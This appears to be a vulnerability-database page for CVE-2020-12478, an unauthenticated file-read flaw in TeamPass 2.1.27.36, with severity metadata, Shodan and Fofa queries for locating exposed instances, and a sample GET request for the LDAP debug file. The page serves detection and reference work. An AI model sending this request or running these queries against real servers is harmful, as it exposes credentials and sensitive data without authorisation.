🔙 목록으로 돌아가기

CVE-2020-12478: TeamPass 2.1.27.36 - Improper Authentication

TitleTeamPass 2.1.27.36 - Improper Authentication
Authorarafatansari
SeverityHigh
ImpactAn attacker can bypass authentication and gain unauthorized access to sensitive information.
RemediationUpgrade to a patched version of TeamPass or apply the recommended security patches.
CVSS Score7.5
EPSS Score0.38993
CVE IDCVE-2020-12478
CWE IDCWE-306
Shodan Queryhttp.html:"teampass"
Fofa Querybody="teampass"
Tags cve2020 cve teampass exposure unauth vuln

🔍 Vulnerability Description

TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /files/ldap.debug.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-12478.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-12478.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A